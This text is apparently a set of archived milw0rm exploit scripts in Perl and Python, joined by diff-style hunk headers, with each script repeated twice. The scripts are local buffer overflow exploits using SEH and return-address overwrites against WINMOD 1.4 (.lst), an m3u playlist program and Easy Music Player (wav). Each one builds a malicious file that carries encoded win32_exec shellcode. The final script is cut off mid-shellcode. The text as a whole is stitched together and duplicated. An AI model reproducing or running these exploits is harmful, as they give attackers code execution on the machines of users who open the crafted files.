# Stack The exploiter
# Whalna rire m3a lprogram mati khdeme hta ti chiyeb lpc :d
# After exec the exploit wait some sec for see the cmd executed :d
use strict;
use warnings;
# win32_exec - EXITFUNC=seh CMD=cmd Size=32 Encoder=Stack http://Sysworm.com =>> http://www.milw0rm.com/exploits/8078
my $shellcode =
"\x8B\xEC\x33\xFF\x57".
"\xC6\x45\xFC\x63\xC6\x45".
"\xFD\x6D\xC6\x45\xFE\x64".
"\xC6\x45\xF8\x01\x8D".
"\x45\xFC\x50\xB8\xC7\x93".
"\xBF\x77\xFF\xD0";
my $junk = "\x41" x 1232;
my $next_seh="\xeb\x06\x90\x90";
my $seh = "\x44\x25\xD1\x72"; #
my $nops = "\x90" x 4;
my $nopsled = "\x90" x 20;
open(my $playlist, "> seh_exploit.m3u");
print $playlist
$junk.$next_seh.$seh.$nops.$shellcode.$nopsled.
"\r\n";
close $playlist;
# milw0rm.com [2009-05-01]


@ -1,44 +1,44 @@
#!/usr/bin/perl
# by hack4love
# hack4love@hotmail.com
# WINMOD V 1.4 (.lst File) Local Buffer Overflow Exploit (SEH)
##http://www.software112.com/products/winmod+download.html
# ## easy ##
# Thanks for ELNAMER ELMASRY\EL7ADRANY\DeCo017\ZAX\ASER ELRO7
## this work sooooooooo good
## Tested on: Windows XP Pro SP2 (EN)
##################################################################
my $bof="\x41" x 2880;
my $nsh="\xEB\x06\x90\x90";
my $seh="\x8c\x29\xd3\x74";##EVIL RET
my $nop="\x90" x 20;
my $sec=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
"\x4e\x56\x43\x46\x42\x30\x5a";
print $bof.$nsh.$seh.$nop.$sec;
###################################################################
open(myfile,'>> HACK4LOVE.LST');
print myfile $bof.$nsh.$seh.$nop.$sec;
###################################################################
# milw0rm.com [2009-07-21]
#!/usr/bin/perl
# by hack4love
# hack4love@hotmail.com
# WINMOD V 1.4 (.lst File) Local Buffer Overflow Exploit (SEH)
##http://www.software112.com/products/winmod+download.html
# ## easy ##
# Thanks for ELNAMER ELMASRY\EL7ADRANY\DeCo017\ZAX\ASER ELRO7
## this work sooooooooo good
## Tested on: Windows XP Pro SP2 (EN)
##################################################################
my $bof="\x41" x 2880;
my $nsh="\xEB\x06\x90\x90";
my $seh="\x8c\x29\xd3\x74";##EVIL RET
my $nop="\x90" x 20;
my $sec=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
"\x4e\x56\x43\x46\x42\x30\x5a";
print $bof.$nsh.$seh.$nop.$sec;
###################################################################
open(myfile,'>> HACK4LOVE.LST');
print myfile $bof.$nsh.$seh.$nop.$sec;
###################################################################
# milw0rm.com [2009-07-21]


@ -1,49 +1,49 @@
#!/usr/bin/python
#[*] Exploit : WINMOD 1.4 (.lst) Universal Buffer Overflow Exploit (SEH)
#[*] Tested on : Xp sp2 fr
#[*] Original exploit : http://www.milw0rm.com/exploits/9221
#[*] By : Dz_Girl
#[*] Greets to : hisok4 (even if he doesn't know me) & all friends
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
shellcode=(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41"
"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x51\x32\x42\x42\x32\x41"
"\x41\x30\x41\x41\x42\x58\x38\x42\x42\x50\x75\x4b\x59\x4b\x4c\x59"
"\x78\x52\x64\x63\x30\x65\x50\x53\x30\x4e\x6b\x57\x35\x77\x4c\x6c"
"\x4b\x61\x6c\x63\x35\x73\x48\x67\x71\x48\x6f\x6e\x6b\x50\x4f\x45"
"\x48\x6e\x6b\x53\x6f\x61\x30\x73\x31\x38\x6b\x53\x79\x4e\x6b\x66"
"\x54\x6e\x6b\x46\x61\x38\x6e\x30\x31\x6b\x70\x6e\x79\x6e\x4c\x4f"
"\x74\x79\x50\x74\x34\x44\x47\x4f\x31\x59\x5a\x76\x6d\x55\x51\x59"
"\x52\x68\x6b\x4a\x54\x35\x6b\x71\x44\x65\x74\x37\x74\x31\x65\x4a"
"\x45\x6e\x6b\x73\x6f\x44\x64\x55\x51\x4a\x4b\x50\x66\x4c\x4b\x44"
"\x4c\x30\x4b\x6e\x6b\x53\x6f\x37\x6c\x46\x61\x58\x6b\x6c\x4b\x77"
"\x6c\x6e\x6b\x46\x61\x5a\x4b\x4f\x79\x31\x4c\x47\x54\x37\x74\x6a"
"\x63\x74\x71\x59\x50\x70\x64\x6e\x6b\x51\x50\x50\x30\x6e\x65\x4b"
"\x70\x72\x58\x64\x4c\x6c\x4b\x71\x50\x56\x6c\x4e\x6b\x52\x50\x57"
"\x6c\x6c\x6d\x4c\x4b\x63\x58\x73\x38\x5a\x4b\x45\x59\x4e\x6b\x4f"
"\x70\x4c\x70\x35\x50\x43\x30\x63\x30\x4c\x4b\x53\x58\x77\x4c\x73"
"\x6f\x56\x51\x48\x76\x53\x50\x66\x36\x4f\x79\x39\x68\x6f\x73\x39"
"\x50\x61\x6b\x30\x50\x61\x78\x4a\x50\x6c\x4a\x73\x34\x33\x6f\x45"
"\x38\x6d\x48\x49\x6e\x6c\x4a\x46\x6e\x76\x37\x69\x6f\x48\x67\x45"
"\x33\x73\x51\x72\x4c\x71\x73\x63\x30\x41")
payload = "DZ"
payload += shellcode
payload += "\x41"*(2868-len(shellcode))
payload += "\xE9\xC7\xF4\xFF\xFF"
payload += "\x61"*5
payload += "\xEB\xF4\x41\x41"
payload += "\x1E\x2F\x40\x00"
try:
out_file = open("exploit.lst","w")
out_file.write(payload)
out_file.close()
print("\nExploit file created!\n")
except:
print "Error"
# milw0rm.com [2009-07-22]
#!/usr/bin/python
#[*] Exploit : WINMOD 1.4 (.lst) Universal Buffer Overflow Exploit (SEH)
#[*] Tested on : Xp sp2 fr
#[*] Original exploit : http://www.milw0rm.com/exploits/9221
#[*] By : Dz_Girl
#[*] Greets to : hisok4 (even if he doesn't know me) & all friends
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
shellcode=(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41"
"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x51\x32\x42\x42\x32\x41"
"\x41\x30\x41\x41\x42\x58\x38\x42\x42\x50\x75\x4b\x59\x4b\x4c\x59"
"\x78\x52\x64\x63\x30\x65\x50\x53\x30\x4e\x6b\x57\x35\x77\x4c\x6c"
"\x4b\x61\x6c\x63\x35\x73\x48\x67\x71\x48\x6f\x6e\x6b\x50\x4f\x45"
"\x48\x6e\x6b\x53\x6f\x61\x30\x73\x31\x38\x6b\x53\x79\x4e\x6b\x66"
"\x54\x6e\x6b\x46\x61\x38\x6e\x30\x31\x6b\x70\x6e\x79\x6e\x4c\x4f"
"\x74\x79\x50\x74\x34\x44\x47\x4f\x31\x59\x5a\x76\x6d\x55\x51\x59"
"\x52\x68\x6b\x4a\x54\x35\x6b\x71\x44\x65\x74\x37\x74\x31\x65\x4a"
"\x45\x6e\x6b\x73\x6f\x44\x64\x55\x51\x4a\x4b\x50\x66\x4c\x4b\x44"
"\x4c\x30\x4b\x6e\x6b\x53\x6f\x37\x6c\x46\x61\x58\x6b\x6c\x4b\x77"
"\x6c\x6e\x6b\x46\x61\x5a\x4b\x4f\x79\x31\x4c\x47\x54\x37\x74\x6a"
"\x63\x74\x71\x59\x50\x70\x64\x6e\x6b\x51\x50\x50\x30\x6e\x65\x4b"
"\x70\x72\x58\x64\x4c\x6c\x4b\x71\x50\x56\x6c\x4e\x6b\x52\x50\x57"
"\x6c\x6c\x6d\x4c\x4b\x63\x58\x73\x38\x5a\x4b\x45\x59\x4e\x6b\x4f"
"\x70\x4c\x70\x35\x50\x43\x30\x63\x30\x4c\x4b\x53\x58\x77\x4c\x73"
"\x6f\x56\x51\x48\x76\x53\x50\x66\x36\x4f\x79\x39\x68\x6f\x73\x39"
"\x50\x61\x6b\x30\x50\x61\x78\x4a\x50\x6c\x4a\x73\x34\x33\x6f\x45"
"\x38\x6d\x48\x49\x6e\x6c\x4a\x46\x6e\x76\x37\x69\x6f\x48\x67\x45"
"\x33\x73\x51\x72\x4c\x71\x73\x63\x30\x41")
payload = "DZ"
payload += shellcode
payload += "\x41"*(2868-len(shellcode))
payload += "\xE9\xC7\xF4\xFF\xFF"
payload += "\x61"*5
payload += "\xEB\xF4\x41\x41"
payload += "\x1E\x2F\x40\x00"
try:
out_file = open("exploit.lst","w")
out_file.write(payload)
out_file.close()
print("\nExploit file created!\n")
except:
print "Error"
# milw0rm.com [2009-07-22]


@ -1,70 +1,70 @@
#!/usr/bin/perl
#
# Winmod 1.4 (.lst) Local Stack Overflow Exploit
# Exploit by CWH Underground
# Tested on Win XP SP2 EN
#
# Download: http://www.software112.com/products/winmod+download.html
#
print "\n==================================================\n";
print " Winmod 1.4 (.lst) Local Stack Overflow Exploit \n";
print " \n";
print " Discovered By CWH Underground \n";
print "==================================================\n";
print " \n";
print " ,--^----------,--------,-----,-------^--, \n";
print " | ||||||||| `--------' | O \n";
print " `+---------------------------^----------| \n";
print " `\_,-------, _________________________| \n";
print " / XXXXXX /`| / \n";
print " / XXXXXX / `\ / \n";
print " / XXXXXX /\______( \n";
print " / XXXXXX / \n";
print " / XXXXXX / .. CWH Underground Hacking Team .. \n";
print " (________( \n";
print " `------' \n";
print " \n";
## win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
my $shellcode="\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
"\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41".
"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x51\x32\x42\x42\x32\x41".
"\x41\x30\x41\x41\x42\x58\x38\x42\x42\x50\x75\x4b\x59\x4b\x4c\x59".
"\x78\x52\x64\x63\x30\x65\x50\x53\x30\x4e\x6b\x57\x35\x77\x4c\x6c".
"\x4b\x61\x6c\x63\x35\x73\x48\x67\x71\x48\x6f\x6e\x6b\x50\x4f\x45".
"\x48\x6e\x6b\x53\x6f\x61\x30\x73\x31\x38\x6b\x53\x79\x4e\x6b\x66".
"\x54\x6e\x6b\x46\x61\x38\x6e\x30\x31\x6b\x70\x6e\x79\x6e\x4c\x4f".
"\x74\x79\x50\x74\x34\x44\x47\x4f\x31\x59\x5a\x76\x6d\x55\x51\x59".
"\x52\x68\x6b\x4a\x54\x35\x6b\x71\x44\x65\x74\x37\x74\x31\x65\x4a".
"\x45\x6e\x6b\x73\x6f\x44\x64\x55\x51\x4a\x4b\x50\x66\x4c\x4b\x44".
"\x4c\x30\x4b\x6e\x6b\x53\x6f\x37\x6c\x46\x61\x58\x6b\x6c\x4b\x77".
"\x6c\x6e\x6b\x46\x61\x5a\x4b\x4f\x79\x31\x4c\x47\x54\x37\x74\x6a".
"\x63\x74\x71\x59\x50\x70\x64\x6e\x6b\x51\x50\x50\x30\x6e\x65\x4b".
"\x70\x72\x58\x64\x4c\x6c\x4b\x71\x50\x56\x6c\x4e\x6b\x52\x50\x57".
"\x6c\x6c\x6d\x4c\x4b\x63\x58\x73\x38\x5a\x4b\x45\x59\x4e\x6b\x4f".
"\x70\x4c\x70\x35\x50\x43\x30\x63\x30\x4c\x4b\x53\x58\x77\x4c\x73".
"\x6f\x56\x51\x48\x76\x53\x50\x66\x36\x4f\x79\x39\x68\x6f\x73\x39".
"\x50\x61\x6b\x30\x50\x61\x78\x4a\x50\x6c\x4a\x73\x34\x33\x6f\x45".
"\x38\x6d\x48\x49\x6e\x6c\x4a\x46\x6e\x76\x37\x69\x6f\x48\x67\x45".
"\x33\x73\x51\x72\x4c\x71\x73\x63\x30\x41";
my $buf="\x41" x 500;
$buf = $buf."\x68\xD5\x85\x7C";
$buf = $buf.("\x90" x 12);
$buf = $buf.$shellcode;
$buf = $buf."\x2E".("\x41"x9);
open(FILE,'>cwh_xpl.lst') or die ("[+] Error: cannot open destination file\n");
print FILE $buf;
close (FILE);
print "[+] Create exploit file successful\n";
print "[+] File's name is cwh_xpl.lst\n";
#####################################################################
#Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK
#Special Thx : asylu3, str0ke, citec.us, milw0rm.com
#####################################################################
# milw0rm.com [2009-07-23]
#!/usr/bin/perl
#
# Winmod 1.4 (.lst) Local Stack Overflow Exploit
# Exploit by CWH Underground
# Tested on Win XP SP2 EN
#
# Download: http://www.software112.com/products/winmod+download.html
#
print "\n==================================================\n";
print " Winmod 1.4 (.lst) Local Stack Overflow Exploit \n";
print " \n";
print " Discovered By CWH Underground \n";
print "==================================================\n";
print " \n";
print " ,--^----------,--------,-----,-------^--, \n";
print " | ||||||||| `--------' | O \n";
print " `+---------------------------^----------| \n";
print " `\_,-------, _________________________| \n";
print " / XXXXXX /`| / \n";
print " / XXXXXX / `\ / \n";
print " / XXXXXX /\______( \n";
print " / XXXXXX / \n";
print " / XXXXXX / .. CWH Underground Hacking Team .. \n";
print " (________( \n";
print " `------' \n";
print " \n";
## win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
my $shellcode="\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
"\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41".
"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x51\x32\x42\x42\x32\x41".
"\x41\x30\x41\x41\x42\x58\x38\x42\x42\x50\x75\x4b\x59\x4b\x4c\x59".
"\x78\x52\x64\x63\x30\x65\x50\x53\x30\x4e\x6b\x57\x35\x77\x4c\x6c".
"\x4b\x61\x6c\x63\x35\x73\x48\x67\x71\x48\x6f\x6e\x6b\x50\x4f\x45".
"\x48\x6e\x6b\x53\x6f\x61\x30\x73\x31\x38\x6b\x53\x79\x4e\x6b\x66".
"\x54\x6e\x6b\x46\x61\x38\x6e\x30\x31\x6b\x70\x6e\x79\x6e\x4c\x4f".
"\x74\x79\x50\x74\x34\x44\x47\x4f\x31\x59\x5a\x76\x6d\x55\x51\x59".
"\x52\x68\x6b\x4a\x54\x35\x6b\x71\x44\x65\x74\x37\x74\x31\x65\x4a".
"\x45\x6e\x6b\x73\x6f\x44\x64\x55\x51\x4a\x4b\x50\x66\x4c\x4b\x44".
"\x4c\x30\x4b\x6e\x6b\x53\x6f\x37\x6c\x46\x61\x58\x6b\x6c\x4b\x77".
"\x6c\x6e\x6b\x46\x61\x5a\x4b\x4f\x79\x31\x4c\x47\x54\x37\x74\x6a".
"\x63\x74\x71\x59\x50\x70\x64\x6e\x6b\x51\x50\x50\x30\x6e\x65\x4b".
"\x70\x72\x58\x64\x4c\x6c\x4b\x71\x50\x56\x6c\x4e\x6b\x52\x50\x57".
"\x6c\x6c\x6d\x4c\x4b\x63\x58\x73\x38\x5a\x4b\x45\x59\x4e\x6b\x4f".
"\x70\x4c\x70\x35\x50\x43\x30\x63\x30\x4c\x4b\x53\x58\x77\x4c\x73".
"\x6f\x56\x51\x48\x76\x53\x50\x66\x36\x4f\x79\x39\x68\x6f\x73\x39".
"\x50\x61\x6b\x30\x50\x61\x78\x4a\x50\x6c\x4a\x73\x34\x33\x6f\x45".
"\x38\x6d\x48\x49\x6e\x6c\x4a\x46\x6e\x76\x37\x69\x6f\x48\x67\x45".
"\x33\x73\x51\x72\x4c\x71\x73\x63\x30\x41";
my $buf="\x41" x 500;
$buf = $buf."\x68\xD5\x85\x7C";
$buf = $buf.("\x90" x 12);
$buf = $buf.$shellcode;
$buf = $buf."\x2E".("\x41"x9);
open(FILE,'>cwh_xpl.lst') or die ("[+] Error: cannot open destination file\n");
print FILE $buf;
close (FILE);
print "[+] Create exploit file successful\n";
print "[+] File's name is cwh_xpl.lst\n";
#####################################################################
#Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK
#Special Thx : asylu3, str0ke, citec.us, milw0rm.com
#####################################################################
# milw0rm.com [2009-07-23]


@ -1,53 +1,53 @@
#
# Winmod 1.4 (.lst) Local Stack Overflow Exploit (RET overwrite+SEH)
# http://www.software112.com/products/winmod+download.html
#
# Exploit for Windows XP SP3 (en)
#
# by corelan - c0d3r
# Greetings to Saumil and SK
#
my $sploitfile = "c:\\program files\\winmod\\xpl_sp3.lst";
my $buf="\x41" x 500;
$buf=$buf.pack('V',0x76B2D577);
$buf=$buf."\x41" x (2880-500);
my $nseh = "\xEB\x06\x90\x90";
my $seh=pack('V',0x7C972ECD);
my $nop = "\x90" x 20;
## win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
my $shellcode="\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
"\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41".
"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x51\x32\x42\x42\x32\x41".
"\x41\x30\x41\x41\x42\x58\x38\x42\x42\x50\x75\x4b\x59\x4b\x4c\x59".
"\x78\x52\x64\x63\x30\x65\x50\x53\x30\x4e\x6b\x57\x35\x77\x4c\x6c".
"\x4b\x61\x6c\x63\x35\x73\x48\x67\x71\x48\x6f\x6e\x6b\x50\x4f\x45".
"\x48\x6e\x6b\x53\x6f\x61\x30\x73\x31\x38\x6b\x53\x79\x4e\x6b\x66".
"\x54\x6e\x6b\x46\x61\x38\x6e\x30\x31\x6b\x70\x6e\x79\x6e\x4c\x4f".
"\x74\x79\x50\x74\x34\x44\x47\x4f\x31\x59\x5a\x76\x6d\x55\x51\x59".
"\x52\x68\x6b\x4a\x54\x35\x6b\x71\x44\x65\x74\x37\x74\x31\x65\x4a".
"\x45\x6e\x6b\x73\x6f\x44\x64\x55\x51\x4a\x4b\x50\x66\x4c\x4b\x44".
"\x4c\x30\x4b\x6e\x6b\x53\x6f\x37\x6c\x46\x61\x58\x6b\x6c\x4b\x77".
"\x6c\x6e\x6b\x46\x61\x5a\x4b\x4f\x79\x31\x4c\x47\x54\x37\x74\x6a".
"\x63\x74\x71\x59\x50\x70\x64\x6e\x6b\x51\x50\x50\x30\x6e\x65\x4b".
"\x70\x72\x58\x64\x4c\x6c\x4b\x71\x50\x56\x6c\x4e\x6b\x52\x50\x57".
"\x6c\x6c\x6d\x4c\x4b\x63\x58\x73\x38\x5a\x4b\x45\x59\x4e\x6b\x4f".
"\x70\x4c\x70\x35\x50\x43\x30\x63\x30\x4c\x4b\x53\x58\x77\x4c\x73".
"\x6f\x56\x51\x48\x76\x53\x50\x66\x36\x4f\x79\x39\x68\x6f\x73\x39".
"\x50\x61\x6b\x30\x50\x61\x78\x4a\x50\x6c\x4a\x73\x34\x33\x6f\x45".
"\x38\x6d\x48\x49\x6e\x6c\x4a\x46\x6e\x76\x37\x69\x6f\x48\x67\x45".
"\x33\x73\x51\x72\x4c\x71\x73\x63\x30\x41";
$buf = $buf.$nseh.$seh.$nop.$shellcode;
print "[+] Writing exploit file \n";
open(FILE,'>$sploitfile');
print FILE $buf;
close (FILE);
print "[+] Exploit file written : $sploitfile\n";
print "[+] File's name is xpl_sp3.lst\n";
# milw0rm.com [2009-07-28]
#
# Winmod 1.4 (.lst) Local Stack Overflow Exploit (RET overwrite+SEH)
# http://www.software112.com/products/winmod+download.html
#
# Exploit for Windows XP SP3 (en)
#
# by corelan - c0d3r
# Greetings to Saumil and SK
#
my $sploitfile = "c:\\program files\\winmod\\xpl_sp3.lst";
my $buf="\x41" x 500;
$buf=$buf.pack('V',0x76B2D577);
$buf=$buf."\x41" x (2880-500);
my $nseh = "\xEB\x06\x90\x90";
my $seh=pack('V',0x7C972ECD);
my $nop = "\x90" x 20;
## win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
my $shellcode="\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
"\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41".
"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x51\x32\x42\x42\x32\x41".
"\x41\x30\x41\x41\x42\x58\x38\x42\x42\x50\x75\x4b\x59\x4b\x4c\x59".
"\x78\x52\x64\x63\x30\x65\x50\x53\x30\x4e\x6b\x57\x35\x77\x4c\x6c".
"\x4b\x61\x6c\x63\x35\x73\x48\x67\x71\x48\x6f\x6e\x6b\x50\x4f\x45".
"\x48\x6e\x6b\x53\x6f\x61\x30\x73\x31\x38\x6b\x53\x79\x4e\x6b\x66".
"\x54\x6e\x6b\x46\x61\x38\x6e\x30\x31\x6b\x70\x6e\x79\x6e\x4c\x4f".
"\x74\x79\x50\x74\x34\x44\x47\x4f\x31\x59\x5a\x76\x6d\x55\x51\x59".
"\x52\x68\x6b\x4a\x54\x35\x6b\x71\x44\x65\x74\x37\x74\x31\x65\x4a".
"\x45\x6e\x6b\x73\x6f\x44\x64\x55\x51\x4a\x4b\x50\x66\x4c\x4b\x44".
"\x4c\x30\x4b\x6e\x6b\x53\x6f\x37\x6c\x46\x61\x58\x6b\x6c\x4b\x77".
"\x6c\x6e\x6b\x46\x61\x5a\x4b\x4f\x79\x31\x4c\x47\x54\x37\x74\x6a".
"\x63\x74\x71\x59\x50\x70\x64\x6e\x6b\x51\x50\x50\x30\x6e\x65\x4b".
"\x70\x72\x58\x64\x4c\x6c\x4b\x71\x50\x56\x6c\x4e\x6b\x52\x50\x57".
"\x6c\x6c\x6d\x4c\x4b\x63\x58\x73\x38\x5a\x4b\x45\x59\x4e\x6b\x4f".
"\x70\x4c\x70\x35\x50\x43\x30\x63\x30\x4c\x4b\x53\x58\x77\x4c\x73".
"\x6f\x56\x51\x48\x76\x53\x50\x66\x36\x4f\x79\x39\x68\x6f\x73\x39".
"\x50\x61\x6b\x30\x50\x61\x78\x4a\x50\x6c\x4a\x73\x34\x33\x6f\x45".
"\x38\x6d\x48\x49\x6e\x6c\x4a\x46\x6e\x76\x37\x69\x6f\x48\x67\x45".
"\x33\x73\x51\x72\x4c\x71\x73\x63\x30\x41";
$buf = $buf.$nseh.$seh.$nop.$shellcode;
print "[+] Writing exploit file \n";
open(FILE,'>$sploitfile');
print FILE $buf;
close (FILE);
print "[+] Exploit file written : $sploitfile\n";
print "[+] File's name is xpl_sp3.lst\n";
# milw0rm.com [2009-07-28]


@ -1,39 +1,39 @@
#!/usr/bin/perl
# by ahwak2000
# email: 0.w[at]w.cn
# Easy Music Player 1.0.0.2 (wav) Universal Local Buffer Exploit (SEH)
# http://www.otbcode.com/downloads/easymusicsetup.exe
###################################################################
my $shellcode=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
